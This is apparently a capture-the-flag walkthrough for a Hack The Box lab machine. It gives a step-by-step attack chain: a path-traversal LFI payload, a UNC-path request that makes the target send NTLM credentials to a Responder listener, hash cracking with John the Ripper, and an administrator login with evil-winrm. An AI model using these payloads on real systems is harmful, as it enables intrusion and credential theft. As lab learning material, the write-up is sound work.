A short note because I struggled a lot to fix this issue, so I want to mention it here before we start:
For this task it is necessary to modify the hosts file of the machine which is used to open the website of the task. I did it correctly, but the issue still persisted, that no website would load. The problem (which was no problem in any task before) was, that I run Kali Linux on a VirtualBox and I had the VPN run on the windows machine. The fix for my problem was, to run the VPN from the Kali VM. May this hint help someone with the same issue!
Time to pwn. Let's scan for open ports (exchange ip with your machines IP address):
nmap -v -Pn ip
We see that port 80 is open. So let's paste the ip into a browser. We get redirected to the url unika.htb, but no website loads "We can’t connect to the server at unika.htb". Time to modify the hosts file:
sudo nano /etc/hosts
After the 127.... addresses, add a new line:
ip unika.htb // in my case: 10.129.60.126 unika.htb
Then hit ctrl + o and then enter to save the file. Then hit ctrl + x to exit the text editor. Open the IP address or url (unika.htb) in your browser (the Kali VM in my case), and the website should load now!
Now we test if LFI (Local File Inclusion) works on the target machine with:
http://unika.htb/index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts
You will see the content of the hosts file in the response, so LFI works. We also know that it's a Windows machine and we will try to capture the NetNTLMv2 when Windows tries to authenticate to our machine when we use SMB. For this the Responder tool is used.
First, check if SMB is turned on:
cd /usr/share/responder cat Responder.conf
Should output (scroll up):
[Responder Core]; Servers to start SQL = On SMB = On ... HTTP = On
SMB is on (good), but HTTP is on as well and this will make the next operation impossible, because port 80 is already used by another service on the machine. Let's turn HTTP off:
sudo nano Responder.conf
Change HTTP to "Off". Then hit ctrl + o and then enter to save the file and then ctrl + x to close the editor. Running the command
sudo python3 Responder.py -I tun0
And then scrolling up, should confirm that HTTP server is off now
Servers: HTTP server [OFF] HTTPS server [ON]
Keep this terminal open, and open another one. Run:
ip a
And copy the "inet" IP without the /xx at the end of "tun0". Now exchange ip with the ip that you copied:
http://unika.htb/?page=//ip/somefile
When running this URL in the browser, an event should pop up in the terminal where Responder is running. Time to crack the NTMLv2-SSP Hash, which should be displayed there! Copy and paste it into a file, like hash.txt.
If you did not use John the Ripper before, you may need to unzip the rockyou.txt file now:
sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
Then, when navigated in the same directory with your hash.txt file, run
john -w=/usr/share/wordlists/rockyou.txt hash.txt
We got the password! Now we connect to the WinRRM service on the target and try to get a session. Exchange ip with the machines IP address.
evil-winrm -i ip -u administrator -p badminton
Then navigate to C:\Users\mike\Desktop and run
cat flag.txt
To get the flag.